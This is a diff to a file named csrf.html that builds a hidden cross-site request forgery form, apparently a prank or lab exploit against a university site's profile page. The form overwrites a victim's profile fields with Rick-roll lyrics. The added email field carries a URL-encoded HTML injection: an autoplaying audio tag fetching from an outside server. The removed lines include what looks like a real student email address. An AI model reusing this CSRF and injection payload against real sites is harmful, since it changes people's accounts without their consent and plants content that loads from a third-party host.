--- a/csrf.html
+++ b/csrf.html
@@ -12,14 +12,14 @@
       method="post"
       id="csrf_form"
     >
-      <input type="hidden" name="sex" value="Never gonna give you up" />
-      <input type="hidden" name="phonenum" value="Never gonna let you down" />
+      <input type="hidden" name="sex" value="Rick Astley" />
+      <input type="hidden" name="phonenum" value="Never gonna give you up" />
+      <input type="hidden" name="add" value="Never gonna let you down" />
       <input
         type="hidden"
-        name="add"
-        value="Never gonna run around and desert you"
+        name="email"
+        value="%3Caudio+controls+src%3D%22https%3A%2F%2Fserver.huanchengfly.top%2Fapi%2Fgiveup%22+autoplay%3E%3C%2Faudio%3E"
       />
-      <input type="hidden" name="email" value="2022201555@ruc.edu.cn" />
       <input type="hidden" name="submit" value="submit" />
       <input type="submit" value="Submit" style="display: none" />
     </form>
